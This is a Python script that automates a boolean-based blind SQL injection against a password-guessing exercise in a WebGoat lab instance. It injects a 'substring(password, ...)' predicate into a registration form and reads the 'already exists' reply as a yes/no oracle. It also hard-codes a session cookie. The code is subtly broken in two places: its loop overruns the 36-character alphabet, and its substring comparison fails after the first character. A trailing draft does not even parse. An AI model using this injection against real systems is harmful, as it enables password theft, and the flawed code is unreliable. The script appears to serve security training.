#!C:\Python36/python.exe
#script injection pour nombre de champs
#import httplib, urllib
import json
import requests
# Target is a local WebGoat training instance (private-range address), lesson
# "SqlInjectionAdvanced" step 4. URL fragments (the part after '#') are not
# transmitted in HTTP requests, so only the path up to start.mvc reaches the server.
url='http://192.168.136.129:8080/WebGoat/start.mvc#lesson/SqlInjectionAdvanced.lesson/4'
# Candidate alphabet for the character-by-character guess: 36 lowercase
# alphanumerics, indexed by position in guess_the_pass.
cara='qwertyuiopasdfghjklzxcvbnm1234567890'
def guess_the_pass(i):
    """Probe one password position of the WebGoat lesson's registration form.

    This is the boolean-based blind SQL injection exercise from the WebGoat
    training lesson named in ``url``: for each candidate character in ``cara``
    a ``tom' and substring(...)`` fragment is submitted as the username, and
    the server's "already exists" reply is used as a yes/no oracle. The payload
    can only have an effect if the application concatenates the username into
    its SQL query; the defensive takeaway the lesson teaches is that
    parameterised queries remove the injection and that an existence check
    which answers differently per input leaks one bit per request.

    Args:
        i: position index inserted into the ``substring`` fragment; the
           module-level call starts at 1.

    Returns:
        None. Progress is printed to stdout; on a hit the function recurses
        with ``i + 1`` to probe the next position.
    """
    for c in range(0,37):
        # Username field carries the injected predicate for this candidate.
        injection="tom' and substring(password, 1,{})='{}".format(i,cara[c]);
        print(injection)
        # Remaining registration fields are fixed filler values.
        data={'username_reg':injection,'email_reg':'[email protected]','password_reg':'123456','confirm_password':'123456'}
        # headers={"Content-type":"application/x-www-form-urlencoded","Accept":"text/plain"}
        headers = {
            # Hard-coded session cookie: a secret committed to source. It should be
            # read from the environment or an untracked config, never stored here.
            'Cookie': "JSESSIONID=ctnNZeiZN-5zi6atSExz9gVwNykATX3OWs6XVuY9",
        }
        # Form is submitted with PUT (no timeout is set, so a stalled server blocks here).
        conn = requests.put(url,headers=headers,data=data)
        #rep=conn.getresponse();
        # Assumes the endpoint answers with JSON; conn.json() raises on any other body.
        page_retour= conn.json()
        print(page_retour)
        # Oracle: the lesson's "already exists" reply marks a true guess.
        # NOTE(review): if conn.json() returns a dict this tests its keys, not its
        # text — confirm the response shape against the server.
        if 'already exists' in page_retour:
            print("there is ")
            print(conn.status_code)
            print(cara[c], end= " ")
            # Move to the next position by recursing; when that call returns,
            # this loop continues with the already-incremented i.
            i+=1
            guess_the_pass(i)
            #print("Le login est :" ,login)
        else:
            # Redundant: the loop would advance on its own.
            continue
# Entry point: start at password position 1. Runs at import time because
# there is no ``if __name__ == "__main__":`` guard.
guess_the_pass(1)
# Dead code kept as a bare string literal: it is never executed and references
# an undefined name ``r``. Left as-is; consider deleting it.
'''
print(r)
print(r.content)
file = open("response.html",'wb')
file.write(r.content)
file.close()
'''
# Earlier httplib-based draft, kept as a bare string literal (never executed).
# As written it would not even parse (``page"/WebGoat..."`` and ``except as e:``
# are syntax errors) and it names a different host than ``url`` above.
'''
site="192.168.126.139"
port=8080
page"/WebGoat/start.mvc"+"#lesson/SqlInjectionAdvanced.lesson/4"
cara='qwertyuiopasdfghjklzxcvbnm1234567890'
for n in range(1,6):
for c in range(0,37):
injection="tom' and substring(password, 1,1)='"+cara[c];
print(injection)
paramaters=urllib.URLencode{'username_reg':injection,'email_reg':'[email protected]','mdp':'password_reg':'123456','confirm_password':'123456','valider':'Valider'})}
headers={"Content-type":"application/x-www-form-urlencoded","Accept":"text/plain"}
try:
conn = httplib.HTTPConnection(site+":"+str(port))
conn.request("POST",page,parameters,headers)
rep=conn.getresponse();
page_retour= rep.read()
if 'Verfiez ' in page_retour:
login =login+carac[c:c+1]
break
print("Le login est :" ,login)
except as e:
print(e)
conn.close()
'''